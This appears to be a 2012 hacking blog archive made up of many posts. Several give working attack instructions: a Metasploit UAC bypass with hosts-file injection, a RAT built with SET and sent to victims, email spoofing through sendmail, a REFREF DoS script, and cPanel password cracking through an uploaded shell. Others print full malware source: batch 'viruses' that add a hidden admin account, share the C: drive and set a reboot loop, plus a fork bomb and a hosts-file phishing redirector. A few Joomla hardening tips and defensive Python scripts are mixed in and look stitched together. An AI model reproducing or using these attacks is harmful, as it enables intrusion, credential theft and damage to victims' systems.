Monday, December 31, 2012

ifixit.com Stored XSS Vulnerability


Well, it has been a long time since I posted anything; I was a bit busy with my university exams. However, I finally managed to get some time to write something. Today I am sharing some of the vulnerabilities I found in a popular website named "ifixit".

I found two XSS: one was a Stored XSS and the second was a Self-XSS. However, the Self-XSS could have been easily exploited by clickjacking techniques, as the page did not set X-Frame-Options; therefore the Self-XSS was also considered.
I have created a short POC of the Stored Cross Site Scripting (XSS) vulnerability; I hope you enjoy it:

iFixit Stored Cross Site Scripting [Video POC]:

iFixit Self-XSS POC


For the above vulnerabilities, I was listed on ifixit.com's responsible disclosure page:


Along with it, they also sent me two T-shirts, some stickers and a 54-bit driver toolkit:

Friday, December 28, 2012

D.N.S. poisoning using metasploit.

Today we will edit the hosts file of a remote PC which has been compromised. By editing the hosts file you can redirect any website to any IP address. Of course we will use Metasploit.

(1) Hack the remote PC. (How to hack a remote PC?)

(2) Now we will bypass the UAC protection of Windows.

(3) Open a terminal and type the following commands:

msfconsole

use exploit/windows/local/bypassuac

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.6

set session 1

exploit

(4) Now we will edit the hosts file.

msf >use post/windows/manage/injet_host

msf post(injet_host) >set domain www.google.com

msf post(injet_host) >set ip Your Desired I.P.

msf post(injet_host) >set session 2

msf post(injet_host) >exploit

This will redirect google.com on the victim's PC to your desired IP.

Monday, December 24, 2012

How to use a R.A.T. through S.E.T.?

RAT stands for Remote Administration Tool; using a RAT you can control a remote PC. There is a lot of RAT software available, but it is made by hackers, so there is a possibility of a backdoor in that readily available software. So today we use a RAT through the Social Engineering Toolkit (SET).

(1) Open your terminal and type

cd /opt/set

./set

(2) Update your SET

(3) Now select option 3, which is Third Party Modules

(4) Now select option 2, which is RATTE (Remote Administration Tool Tommy Edition).

(5) Enter the IP address of your computer to connect back to

(6) Port RATTE Server should listen on [8080]: press enter

(7) Should RATTE be persistent [no|yes]?: yes

(8) Use specific filename (ex. firefox.exe) [filename.exe or empty]?: cool.exe

(9) Payload has been exported to src/program_junk/ratteM.exe

(10) Now send your ratteM.exe file to the victim; as soon as they download and open it:

Start the ratteserver listener now [yes|no]:yes

(11) Choose option 1, which is list clients

(12) If the payload has been executed successfully, you will see a new session and the client details. Note down the session number. Enter the session you want to interact with: press 0 here

Now choose option 2, "activate client".

Now you get a menu with lots of options. Select the first option, which is start shell.

Sunday, December 23, 2012

Hackers Get Your Team Ready - CTF 365



When it comes to the infosec industry, we all know that practice is the best way to learn how to defend and protect your systems and, more importantly, how to find vulnerabilities and flaws within the systems you are after. This is never-ending training, and the way you can do it most intensely and extensively is in CTF competitions.

Today's CTFs are becoming more and more complex and engaging. You can find everything from level-based CTFs, where you have to pass a level in order to get access to the next, up to more sophisticated systems that mimic different scenarios like internet bank phishing or complex money laundering, up to attack-and-defend games where each team gets a server full of vulnerabilities or flaws and has to patch it while other members exploit the other teams' servers.

Any good thing comes with bad things too. Besides their value as an alternative to infosec training labs, there are also some cons. CTFs are held yearly, spread all over the world, held for a short period of time, far from the real-world internet (e.g. no DoS or DDoS attacks allowed). Most of them fall into oblivion, even though they are fun.

We at CTF365 decided to change CTF competitions for the better and we promise to blow away your expectations. We'll simply build an internet within The Internet where everything will be possible. Well, almost everything. Routers, switches, networks, DoS or DDoS attacks, you name it.
CTF365 is World of Warcraft for hackers, except that instead of fighting in a fantasy world with imaginary powers against imaginary characters, CTF365 will replicate the real world as much as possible, and you will have to fight with your own real tools... hacking tools.

BackTrack, Metasploit, Nmap, BackBox Linux or whatever you choose to use as weapons. You will have your own fortress (your own server) to defend, with your own network, routers and switches. You will build your own team and we will provide you with RTTK (Red Team Tool Kit) for team communication and many more features. There will be as few rules as possible, trying to get to the perfect cyber wargame: no rules at all.

CTF365 will provide the infrastructure, VPS included.

This is the CTF365 team's goal: to create an internet within the real internet, a place where everybody can hack others' machines while protecting their own and become better and better in their day-to-day training.

CTF365 will test teams on both defensive and offensive skills, and its goal is to make players become better at what they love to do most: offensive and/or defensive security. Having a place full of different kinds of systems gives players the opportunity to feel like in real life, when you don't know what will be around the corner.

As a system administrator, you and your team can experiment with new configurations without the fear that something could go wrong, or you can simply train your skills to protect your system. CTF365 is the ultimate testing field for server administrators and pentesters.

Friday, December 21, 2012

How to install and configure sendmail in Ubuntu?

Sendmail is a program which will help you to send email from the command line; you can send email from the terminal or CMD. In this setup we use our own machine as the mail server. I will show you how to install and configure sendmail, so we can spoof email to targets. But the problem is that this email is detected as spam due to being sent automatically from a machine.

How to Install Sendmail?


Open a terminal and type the following commands.

sudo apt-get install mailutils

sudo apt-get install sendmail


How to configure it?


After installing sendmail, you should configure it. It's a little hard, but don't worry; after that we can spoof email to anyone.

Type the following command in the terminal:

sudo gedit /etc/mail/sendmail.mc

It will open the sendmail.mc file.

For example, your last two lines are as follows:

MAILER(`local')dnl

MAILER(`smtp')dnl

Put this code before those two lines.

MAILER_DEFINITIONS

define(`SMART_HOST', `smtp.gmail.com')dnl

OK, now close that file.

Now we will generate the configuration file (.cf) from the .mc file, so type the following command in the terminal.

sudo bash -c 'cd /etc/mail/ && m4 sendmail.mc > sendmail.cf'

Now everything is complete; try to send mail using the terminal, or use the Social Engineering Toolkit as I mentioned in a previous post.


How to send mail through Command?


Open a terminal and type the following commands.

telnet 127.0.0.1 25

HELO server

MAIL FROM: <sender's email address>

RCPT TO: <recipient's address>

DATA

Subject: Test mail

From: sender's email address

To: receiver's address

Test Mail

.

quit


Now check the spam folder of the receiver's mailbox: you got the email. Now check the "show original" option of the email; you can see the IP of the sending computer, the OS, and many other things.
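The "show original" check at the end of the post can be automated. As an added example (not part of the original post), the script below walks the Received: headers of a constructed message to find the originating IP and flags a mismatch between Return-Path (copied from the SMTP MAIL FROM) and the From: header. Every host name and address in the sample is made up.

```python
"""Trace a received message back to the sending machine, the way the post's
'show original' check does, and flag an envelope/header sender mismatch.

Added example, not part of the original post. SAMPLE_RAW is a constructed
message; every host name and address in it is made up.
"""
import email
import email.utils
import re
from email.message import Message
from typing import Dict, List, Optional

# Constructed message as a receiving mailbox might store it. The header
# block grows from the top as each relay prepends its own Received: line.
SAMPLE_RAW = """\
Return-Path: <ubuntu@box.example.test>
Received: from mail-gw.example.test (mail-gw.example.test [203.0.113.5])
\tby mx.recipient.example (Postfix) with ESMTPS id 4Abc
\tfor <victim@recipient.example>; Sun, 23 Dec 2012 10:00:00 +0000
Received: from box.example.test (box.example.test [192.0.2.10])
\tby mail-gw.example.test with ESMTP id 7Xyz
\tfor <victim@recipient.example>; Sun, 23 Dec 2012 09:59:58 +0000
From: support@bank.example
To: victim@recipient.example
Subject: Test mail

Test Mail
"""

# Relays write the peer address in square brackets; IPv4 only in this example.
BRACKETED_IPV4 = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def received_chain(msg: Message) -> List[str]:
    """Peer IPs from the Received: headers, ordered from the sender outwards.

    Headers are prepended as the mail travels, so the last Received: line is
    the one written closest to the originating machine; reverse the order.
    """
    ips = []
    for header in msg.get_all("Received", []):
        match = BRACKETED_IPV4.search(str(header))
        if match:
            ips.append(match.group(1))
    return list(reversed(ips))


def originating_ip(msg: Message) -> Optional[str]:
    """The first hop's peer address, i.e. the box that ran the SMTP session."""
    chain = received_chain(msg)
    return chain[0] if chain else None


def envelope_mismatch(msg: Message) -> bool:
    """True when Return-Path (copied from MAIL FROM) and From: differ.

    A mismatch alone is not proof of spoofing (mailing lists do it
    legitimately), but together with an unexpected originating IP it is
    the tell the post describes.
    """
    envelope = email.utils.parseaddr(msg.get("Return-Path", ""))[1].lower()
    header = email.utils.parseaddr(msg.get("From", ""))[1].lower()
    return bool(envelope and header and envelope != header)


def analyse(raw: str) -> Dict[str, object]:
    """Summarise one raw message for triage."""
    msg = email.message_from_string(raw)
    return {
        "origin": originating_ip(msg),
        "chain": received_chain(msg),
        "envelope_mismatch": envelope_mismatch(msg),
    }


if __name__ == "__main__":
    print(analyse(SAMPLE_RAW))
```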

Wednesday, December 19, 2012

How to install the Social Engineering Toolkit (S.E.T.) in Ubuntu?

The Social Engineering Toolkit is a cool tool which comes with BackTrack; it increases the power of Metasploit. If you are on any Linux system other than BackTrack, you can install it as follows.

Updated: This article was written when S.E.T. used SVN. It has now moved to GitHub, so please click here for the new installation method.

The extra packages which are necessary to use SET effectively are as follows.

(1) Metasploit: You can see my old post about how to install Metasploit in Ubuntu here.

(2) Ettercap: If you are on a network and want to attack the network with a Man-in-the-Middle attack or DNS poisoning, then you require it.

To install Ettercap, open a terminal and type the following command:

sudo apt-get install ettercap

(3) OpenJDK 6: It's a necessary program to use SET. Just type the following command in the terminal:

sudo apt-get install openjdk-6-jdk


Now open a terminal and change directory to /opt.

sudo bash

cd /opt

svn co http://svn.secmaniac.com/social_engineering_toolkit set/

cd /opt/set

svn update

nano config/set_config

Now we will configure it. First it requires the Metasploit path, so we will put it in the config file. Here comes a problem: in the first step we installed Metasploit, and its directory is /opt/metasploit-4.4.0/msf3. But when we put this path in the config file it cannot detect Metasploit. So we have to rename metasploit-4.4.0 to framework3. So rename the metasploit-4.4.0 folder to framework3.

Put the path /opt/framework3/msf3 in the config file. Save it. Then type in the terminal:

./set

It will open SET.

In the next tutorial I will show you how to configure sendmail and use it in SET.

I know I cannot explain well, so if you face any problem please mention it in the comments.


The Story Behind, How The Data Was Stolen

No one likes to hear the bad news that their computer, email, or phone has been hacked and the data stored in it has been plundered by cyber criminals. And hearing this news at the end of the year, with Christmas approaching, can only be the Grinch's cherry on top of a year of disastrous security failures. But the sad fact is that many more people are being faced with this problem as Grinch-like hackers continue to steal data on an increasingly significant scale. We may think that we are safe from the problem, but in reality we are right in the midst of it, with internet giants coming under fire as well!

Armed with keyloggers, Trojans, backdoor exploit methods and whatnot, these Grinches are pulling for the grand finale as 2012 comes to a close. Of course, this means that the data industry has been lacking some major incentives and preventive measures, which allowed these criminals to slip in between the cracks and make off with our data. The data breach investigations report is a pictorial representation of the actual scenario; read it to figure out what happened.


Source: MobiStealth.com

Tuesday, December 18, 2012

PayPal Pays Me A Total Bounty Of 10,000 For The Command Execution Bug

                  
Recently, I wrote about the command execution vulnerability I found in PayPal, for which they sent me an initial payment of 5000$. This story was featured on lots of popular technology blogs like Softpedia, ProPakistani, MyBloggertricks etc. Recently I received an email from PayPal, where they informed me that they have deposited the remaining bounty "4750$" into my business partner's PayPal account.


I would also like to let you know that more than 20 bugs I sent are still being validated by PayPal.

Monday, December 17, 2012

Mohammad Chose Blogging, I Choose Hacking

Well, this post is not an ordinary one that talks about "Making a Six Figure Income Online" or making millions from blogging; it rather contains some interesting pieces of advice for novice bloggers and also the ninjas out there who are struggling hard to survive online. It all started when Mohammad and I met back in 2009 in a snooker club. We were both interested in blogging and Internet marketing, so we had arranged a meeting in order to share our existing blogging strategies.
Read more about the whole story on Mybloggertricks: "Mohammad Choose Blogger, I Choose Hacking".

Download Free E-books about Hacking


Hello guys, if you want to learn more about hacking and computer security, I uploaded the eBooks below to Dropbox. The download link is at the end.

The list of books is as follows.

(1)CEH(Certified Ethical Hackers)2010V6.

(2)Hacking Wireless Networks For Dummies.

(3)H gray hat hacking.

(4)Blind_SQLInjection.

(5)backtrack-4-assuring-security-by-penetration-testing.

(6)Collections of Ankit Fadia Hacking Book.

(7)Secrets of Reverse Engineering.

(8)Social Engineering toolkit

(9)Ethical Hacking and Countermeasures- Web Applications and Data Servers.

New books Added

(10)CSRF attack & Defense

(11)Armitage guide

(12)Pass-the-hash attacks: Tools and Mitigation

(13)HACKING: THE ART OF EXPLOITATION


(14)XSS Attacks - Exploits and Defense


(15)Seven Deadliest Network Attack 


Download link:- Please click here.

Sunday, December 16, 2012

How to use REFREF?

As we know, in the past the famous hacktivist group Anonymous carried out a series of DDoS attacks on a number of websites like PayPal, MasterCard and Visa. At that time they used the tool LOIC to take the websites down.

Although they succeeded in their project, because of LOIC some of the hackers were arrested later. So they decided to build a new weapon for DoS attacks.

It was REFREF. It is programmed in Perl, Java and Python. But the main requirement is that the URL must be vulnerable to SQL injection. It means that if you find a website which is vulnerable to SQL injection, then by using this tool you can easily take the website down.

You can download the REFREF script from here.

How to use?


It's pretty simple. Just open a terminal, change directory and execute the script.

cd Downloads

perl refref.pl <vulnerable URL>

It will take the website down in a short time. This tool is very effective: a 17-second attack from a single machine resulted in a 42-minute outage on Pastebin.

Thursday, December 13, 2012

Batch File Virus -4

@echo off

cd\

cd %SystemRoot%\system32\

md 1001

cd\

cls

rem N0 H4rm 15 cau53d unt1| N0w

rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| ch4ng3 th3 t1m3 2 12:00:00.0 & d4t3 as 01/01/2000

echo 12:00:00.00 | time >> nul

echo 01/01/2000 | date >> nul

net users Microsoft_support support /add

rem Th3 u53r 4cc0unt th4t w45 Cr34t3d 15 ju5t 4 |1m1t3d 4cc0unt

rem Th15 p13c3 0f c0d3 w1|| m4k3 th3 |1m1t3d u53r 4cc0unt5 t0 4dm1n15tr4t0r 4cc0unt.

net localgroup administrators Microsoft_support /add

rem 5h4r3 th3 R00t Dr1v3

net share system=C:\ /UNLIMITED

cd %SystemRoot%\system32\1001

echo deal=msgbox (”Microsoft Windows recently had found some Malicious Virus on your computer, Press Yes to Neutralize the virus or Press No to Ignore the Virus”,20,”Warning”) > %SystemRoot%\system32\1001\warnusr.vbs

rem ch4ng35 th3 k3yb04rd 53tt1ng5 ( r4t3 4nd d3|4y )

mode con rate=1 > nul

mode con delay=4 >> nul

rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| d15p|4y 50m3 4nn0y1ng m5g, as c0d3d ab0v3, 3×4ct|y @ 12:01 and 12:02

at 12:01 /interactive “%SystemRoot%\system32\1001\warnusr.vbs”

at 12:02 /interactive “%SystemRoot%\system32\1001\warnusr.vbs”

msg * “You are requested to restart your Computer Now to prevent Damages or Dataloss” > nul

msg * “You are requested to restart your Computer Now to prevent Damages or Dataloss” >> nul

rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| c0py th3 warnusr.vbs f1|3 2 th3 5t4rtup, th4t w1|| b3 3×3cut3d @ 3v3ryt1me th3 c0mput3r 5t4rt5

copy %SystemRoot%\system32\1001\warnusr.vbs “%systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\warnusr.vbs”

rem ***************************************************************************

rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| d15p|4y Th3 5hutd0wn d14|05 B0X w1th 50m3 m5g and w1|| r35t4rt c0nt1nu0u5|y

echo shutdown -r -t 00 -c “Microsoft has encountered a seriuos problem, which needs your attention right now. Hey your computer got infected by Virus. Not even a single anti-virus can detect this virus now. Wanna try? Hahahaha....! ” > %systemroot%\system32\1001\sd.bat

copy %systemroot%\Documents and Settings\All Users\Start Menu\Programs\Startup\sd.bat “%systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\sd.bat”

rem ***************************************************************************

cd\

cls

rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| m4k3 th3 v1ru5 b1t 5t34|th13r

cd %systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\

attrib +h +s +r warnusr.vbs

attrib +h +s +r sd.bat

cd\

cd %systemroot%\system32

attrib +h +s +r 1001

rem K1||5 th3 3xp|0r3r.3×3 Pr0c355

taskkill /F /IM explorer.exe

rem @ EOV // End of Virus

Copy the source code and paste it into Notepad, then save it with the .bat extension. This virus program will begin its operation in C:\windows\system32 and create a new directory named '1001', change the time to 12:00 and the date to 01-01-2000, then create a new user with the account name 'Microsoft_support' and the matching password 'support'.

It automatically assigns administrator rights to the user account that was created, then shares the root drive 'C:', which really is a security issue, making the system completely vulnerable. It will create a VBScript file named 'warnusr.vbs' that is used to display the message 'Microsoft Windows recently had found some Malicious Virus on your computer, Press Yes to Neutralize the virus or Press No to Ignore the Virus', which really seems to come from the operating system itself; then it will change the keyboard settings by reducing the rate and delay time. Since the time and date have already been modified by the virus, it will automatically pop up a message stating 'You are requested to restart your Computer Now to prevent Damages or Data loss' exactly at 12:01 and 12:02; if the user restarts the computer, then it's gone.

Whenever the user tries to log in to the computer, it will automatically reboot continuously, because the command 'shutdown -r' is set with time 00 and kept in the startup folder. The user has no way to stop this unless he enters safe mode and deletes the file; moreover the file is set with the system and hidden attributes, making it invisible.

The only way to stop this is to enter safe mode and disable the startup items, and then delete the files that reside in C:\windows\system32\1001 and in the startup folder.

You can also use some exe-binders to bind this virus with any audio, video, text or whatever files, then use some social engineering technique to make the victim execute the file himself and harm his/her computer.

You can create this virus without using any third-party tools in Windows; also, instead of an exe-binder, you can use the 'iexpress' wizard to create a custom package.

Wednesday, December 12, 2012

Batch File Virus -3

Most of us have heard of 'fork()', which is used to create a child process; likewise, fork bombing is nothing but a program calling itself again and again in an infinite loop and making the system crash by popping up hundreds of windows on the screen.

@echo off

:loop

Explorer

Call fork.bat

Goto loop

Copy the above program, paste it into a Notepad file and save it as 'fork.bat'. The explorer command will open up the 'Documents' directory, and it is given inside a loop; then the same batch file is called again, which in turn opens up multiple Documents windows in a loop. Likewise it goes on by calling the program itself again and again until the system crashes or hangs.

Tuesday, December 11, 2012

WOW! Paypal Sends Me 5000$ For A Command Execution Vulnerability


Update: 5000$ was the initial payment; PayPal paid another 5000$, which makes the total bug bounty 10,000$ for the command execution vulnerability:

PayPal Pays Me A Total Bounty Of 10,000 For The Command Execution Bug


Today when I logged into my Gmail account, I saw PayPal sent me 5000$ for the command execution bug I reported on one of its subdomains. That constituted a huge risk to the organization, since an attacker could have easily managed to execute any command on the server. Therefore the bug was extremely critical; however, PayPal took more than 2 months to sort it out.
I cannot write more about the vulnerability per the terms of the bug bounty program.
Along with the command execution vulnerability, I was paid 500$ for an XSS vulnerability that I found on the PayPal main domain; furthermore, I was also paid for an information disclosure. So in total they sent me an amount of 6000$.

More than 20 of my bugs are still being validated by PayPal.




Last week, I was offered a job by PayPal as a Senior Pentester, a.k.a. Security Ninja. Kindly look at the screenshot below:

Cracking Cpanel Passwords [Tutorial 2]


One of our guest authors already wrote a post on "Cracking Cpanel passwords"; however, that method worked for some sites and did not work on others. Recently Avinash mailed me a guest post which contained two working methods that can be used to crack Cpanel passwords. I have tested both methods myself and they are working. However, for this method to work, the website on which your shell is uploaded should already be vulnerable to Symlink Bypass (Server Bypass).


Method 1 [Cracking CPanel Passwords]

Requirements:

1. PHP Backdoor (Shell) installed on a server.
2. Required Files

First create two folders; I'm creating abc & xyz. Now I will upload the files to do the symlink and do the symlink. Next give 0755 permission to jaguar.pl, run it and put etc/passwd in it. After this you will get all the configs; now you are done with symlinking the server.

Now go to the second folder we created and upload B_F.php, and place your symlink folder link in it. Then click on start, and you have your cpanels.

Screenshots For Further Explanation






Method 2 [Cracking CPanel Passwords]

Requirements:
1. Shell On The Server
2. Cpanel.py
3. Python already installed on your server.


We have to run the script from the command prompt, so we need to create a directory with any name, let's say "a" in this case.

How to run the script?

Open the command prompt and navigate to the directory where you have placed the script.

Then type cracker.py www.site.com/abc (this will be our symlinked folder link) c:\a (this is where the output will be saved) and then press enter. It will start its work.

Next it will give you the passwords; copy them all, upload a cpanel bruter and paste all the passwords in the pass area. For the users, go to the shell and run the command

ls /var/mail

And you will get all the usernames; paste them in the users area and click on start.

Screenshots For Further Explanation






About the Author:
Avinash is a security researcher and a blogger. He runs a blog http://www.hackerzadda.com/, where he writes about hacking.

Batch file virus -2

Batch programming allows its programmers to create their own custom viruses just by misusing the way commands work, which leads to the creation of batch viruses. In this chapter we are going to learn about the dark side of batch by learning how to misuse commands to create batch viruses.

Folder Replicator Virus:

Here is a simple batch virus that contains only 6 lines; it has the tendency to replicate itself again and again and keeps on creating a folder with the same name until a user stops it.

1. Just open up Notepad, copy and paste the code below

cd\

cd C:\Documents and Settings\username\Desktop

:loop

md Virus

cd Virus

goto loop

2. Save it as a batch file with the extension .bat; before doing that you have to modify the code by changing the place where it says 'username' and replacing it with the currently logged-in username.

3. Then run it on the victim's computer to infect it.

4. Anyhow, it doesn't cause much harm, but replicates a folder inside a folder and goes on.

One more thing that you have to notice is that this will create a directory inside another directory with the same name, so it doesn't look like a mess, since everything resides inside one main directory; moreover, deleting the root directory will purge all the clumsy things done by this piece of code.

Monday, December 10, 2012

Secure Joomla From Hackers


Recently we wrote articles on "Wordpress Mass Defacement Tool" and "Securing Your Wordpress from being Hacked". However, I was requested by one of our readers to write an article on securing a Joomla blog from hackers and preventing it from being hacked. Joomla, just like WordPress, is a very widely used CMS platform. Joomla itself is quite secure by default; however, the extensions are developed by ordinary developers and most of them have no proper knowledge about security.

Nowadays, I have observed that most hackers do not target vulnerable Joomla extensions or Joomla itself; instead they target other websites on the same server and use them to extract the Joomla configuration file that contains the database information. This vulnerability is commonly known as Symlink bypass in the black hat community and Server bypass in the white hat community. So in this article I will talk about the common methods to secure Joomla from hackers and prevent it from being hacked.

Secure Joomla From Hackers [Common Methods]

Choose A Secure Password

Joomla uses MD5 for generating password hashes. Though MD5 hashes are prone to some weaknesses, Joomla makes them more secure by adding a salt. Here is how a Joomla hash looks:

4e9e4bcc5752d6f939aedb42408fd3aa:0vURRbyY8Ea0tlvnTFn7xcKpjTFyn0YT

The first part represents the MD5 hash and the part after the colon represents the salt. This adds an extra layer of security to Joomla passwords; however, these hashes can still be cracked with software like PasswordsPro and oclHashcat-plus. Moreover, nowadays graphics cards are being used for password cracking, which makes the job much easier and takes very little time. For a good guide on choosing strong passwords, kindly refer to my article "How To Create A Strong Password".

Securing Admin Panel

It's not a good idea to leave your admin panel open to normal users; it should only be accessible by administrators. Imagine an attacker has managed to extract your database information using SQL injection: he would still need the admin panel to log in. If you hide the admin panel, he won't be able to access it.

You can do it by blocking access to the public_html/Joomla/administrator directory and making it accessible only from your IP, by adding the following directives to its .htaccess:

Order Deny,Allow
Deny from all
Allow from <Your IP Address>

Alternatively you can use an extension called jSecure. It protects your admin panel by generating a key which is only known to you, so the administrator panel can only be accessed if you have the proper key.


Update Update And Update

Most of the time vulnerabilities are found within Joomla itself and you have very little time to update your blog, or else you end up getting your blog hacked. I recommend you subscribe to the exploit databases 1337day.com and exploit-db.com; most of the exploits go public there, so whenever you see a vulnerability inside Joomla, you will have plenty of time to update. I keep an eye on Bugtraq and seclists.org so that whenever a vulnerability goes public, I am able to get information regarding it.



Scanning For Vulnerable Plugins/Extensions

As I mentioned at the beginning of the article, webmasters install Joomla plugins/extensions without checking whether they are vulnerable. You should periodically check exploit databases to see if the extensions you are using are vulnerable to any attacks. It would be a hassle to check every extension individually. Alternatively, a tool named "joomscan" has made life easier: it is periodically updated with lots of new vulnerabilities, checks your website for commonly vulnerable extensions and reports them to you.





Protecting From Shell Uploads

Once an attacker gains access to your administrator panel, he will usually upload a PHP backdoor to maintain access to your website, commonly known as a "shell" in the black hat community. All you need to do in order to protect against shell upload is to change the permissions of the images directory to 400, which will make the whole directory non-writable. This will prevent hackers from uploading a shell and also from penetrating further.

An attacker can alternatively try to upload the shell via FTP, so you should also make sure that you disable port 21 / disable FTP access.

Securing From Symlink

Symlink bypass is one of the most commonly used attacks. Even if your Joomla website is completely secure, it's still possible for an attacker to extract your configuration file "configuration.php", which contains the database username and password, via an attack called Symlink bypass. In order to protect your configuration.php, you need to change its permissions to 400.

You can do it with the following command:

chmod 400 configuration.php

Protect From Mass Defacement

Many times hackers manage to gain root access to the server on which your Joomla blog is hosted. In these cases the attacker runs a mass defacement tool/script, which changes the index files of all the websites running on the server. In order to protect your blog from a mass defacement attack, all you need to do is change the permissions of index.php to 400. However, this does not provide complete protection, because once the hacker has root on the server, he can manually change the permissions of your blog and hence deface your website.
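As an added example (not Joomla's own code, nor from this post), the script below verifies a password against the salted MD5 format shown above and checks or applies the 400 permissions recommended for configuration.php and index.php. It assumes the classic Joomla layout hex(md5(password + salt)):salt with a 32-character alphanumeric salt; the temporary file it locks down is a stand-in for configuration.php.

```python
"""Two checks for the controls this post recommends: Joomla's salted MD5
password format and 400 permissions on configuration.php / index.php.

Added example, not Joomla's own code. It assumes the classic Joomla hash
layout shown in the post: hex(md5(password + salt)) ':' salt, where the
salt is a random 32-character alphanumeric string.
"""
import hashlib
import hmac
import os
import secrets
import stat
import string
import tempfile
from typing import Optional, Tuple

SALT_ALPHABET = string.ascii_letters + string.digits

# The stored value quoted in the post (password unknown; used only as a
# well-formed sample of the format).
PAGE_HASH = "4e9e4bcc5752d6f939aedb42408fd3aa:0vURRbyY8Ea0tlvnTFn7xcKpjTFyn0YT"


def joomla_hash(password: str, salt: Optional[str] = None) -> str:
    """Build a stored value in the 'md5hex:salt' form the post shows."""
    if salt is None:
        salt = "".join(secrets.choice(SALT_ALPHABET) for _ in range(32))
    digest = hashlib.md5((password + salt).encode("utf-8")).hexdigest()
    return f"{digest}:{salt}"


def joomla_verify(password: str, stored: str) -> bool:
    """Recompute md5(password + salt) and compare it in constant time.

    The salt is public (it sits right after the colon), so it does not slow
    down cracking of a single hash; what it buys is that two users with the
    same password get different hashes and precomputed tables do not apply.
    """
    if ":" not in stored:
        return False  # unsalted legacy value or garbage: treat as failure
    digest, salt = stored.split(":", 1)
    candidate = hashlib.md5((password + salt).encode("utf-8")).hexdigest()
    return hmac.compare_digest(candidate, digest)


def file_mode(path: str) -> int:
    """Permission bits of a file, e.g. 0o400."""
    return stat.S_IMODE(os.stat(path).st_mode)


def is_locked_down(path: str) -> bool:
    """True when the file is readable only by its owner (0400 or tighter)."""
    # 0o377 covers owner write/exec plus every group and other bit.
    return file_mode(path) & 0o377 == 0


def lock_down(path: str) -> int:
    """Apply the post's chmod 400 and return the resulting mode."""
    os.chmod(path, 0o400)
    return file_mode(path)


def demo_lock_down() -> Tuple[bool, int, bool]:
    """Create a throwaway stand-in for configuration.php with loose 644
    permissions, lock it down, and report (before, mode_after, after)."""
    fd, path = tempfile.mkstemp(prefix="configuration.php.")
    os.close(fd)
    try:
        os.chmod(path, 0o644)
        before = is_locked_down(path)
        mode_after = lock_down(path)
        return before, mode_after, is_locked_down(path)
    finally:
        os.chmod(path, 0o600)  # make it deletable again, then remove it
        os.unlink(path)


if __name__ == "__main__":
    stored = joomla_hash("correct horse battery staple")
    print(stored, joomla_verify("correct horse battery staple", stored))
    print(demo_lock_down())
```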

I hope you have liked my post on "Secure Joomla From Hackers". Though there is a lot left, I have highlighted the important steps in order to protect your website from being hacked.

DNS poisoning using BATCH File

Batch file programming is the native scripting offered by the Microsoft Windows operating system. A batch file is created using any text editor like Notepad, WordPad, WinWord and so on, and comprises a sequence of built-in commands used to perform frequently done tasks like deleting a series of files of the same or different types, creating logs, clearing unwanted junk from your computer and even creating a batch VIRUS.

DNS poisoning:


A batch file can hijack name resolution by editing the hosts.txt file that resides at 'C:\windows\system32\drivers\etc\hosts.txt', so that it takes you to some malicious website instead of landing you on the legitimate one. This may also be used for phishing, i.e. redirecting you to a bogus website which looks exactly like the legitimate one, and then stealing credentials.

1. Just open up Notepad, copy and paste the code below

@echo off

echo 10.199.64.66 www.google.com >> C:\windows\system32\drivers\etc\hosts.txt

echo 10.199.64.67 www.paypal.com >> C:\windows\system32\drivers\etc\hosts.txt

exit

2. Save it as a batch file with the extension .bat

3. Then run it on the victim's computer to infect it.

4. This program creates new entries in the hosts file, so that whenever a user attempts to go to www.google.com, he will be redirected to another host that has the IP address 10.199.64.66; likewise, if the user attempts to log in to his PayPal account by typing www.paypal.com, he will be redirected to an external bogus website that has the IP address 10.199.64.67, where if the user unknowingly enters his credentials, they go into the hacker's database and he can use them for several other purposes.
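The Metasploit hosts-file post above and this batch file both work by appending lines to the hosts file. As an added example (not from either post), here is a small Python auditor that parses that file format and flags watched domains pinned to a non-loopback address; the watch list and the sample hosts content are constructed, and in practice you would point it at %SystemRoot%\System32\drivers\etc\hosts (or /etc/hosts) on a box you administer.

```python
"""Audit a hosts file for hijacked hostnames.

Added example, not from the original posts. It parses the format the batch
file above appends to and flags any watched domain that is mapped to an
address other than loopback.
"""
import ipaddress
from typing import Dict, List, Optional, Set, Tuple

# Domains whose resolution should never be overridden locally (assumed
# watch list; extend it with your own organisation's names).
WATCHED_DOMAINS: Set[str] = {"www.google.com", "www.paypal.com", "paypal.com"}

# Constructed sample hosts file: the first lines are the defaults Windows
# ships with, the last two are the kind of entry the batch file above appends.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
10.199.64.66 www.google.com
10.199.64.67 www.paypal.com   # injected
"""


def parse_hosts(text: str) -> List[Tuple[str, List[str]]]:
    """Return (address, [hostnames]) for every non-comment line.

    Fields are whitespace-separated; anything after '#' is a comment.
    Malformed lines (no hostname, or an address that does not parse) are
    skipped rather than raising, since a tampered file may be messy.
    """
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        if len(parts) < 2:
            continue
        try:
            ipaddress.ip_address(parts[0])
        except ValueError:
            continue
        entries.append((parts[0], [h.lower() for h in parts[1:]]))
    return entries


def find_hijacks(text: str, watched: Optional[Set[str]] = WATCHED_DOMAINS) -> Dict[str, str]:
    """Map each watched hostname to the non-loopback address it is pinned to.

    A watched domain pointing anywhere except loopback is treated as a
    hijack: legitimate hosts-file entries for public sites are rare, and the
    loopback exception keeps ad-block style sinkholes out of the report.
    Pass watched=None to report every non-loopback entry instead.
    """
    hijacked: Dict[str, str] = {}
    for addr, hosts in parse_hosts(text):
        if ipaddress.ip_address(addr).is_loopback:
            continue
        for host in hosts:
            if watched is None or host in watched:
                hijacked[host] = addr
    return hijacked


if __name__ == "__main__":
    for host, addr in find_hijacks(SAMPLE_HOSTS).items():
        print(f"HIJACKED {host} -> {addr}")
```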

Friday, December 7, 2012

How to scan web-server with Nikto?

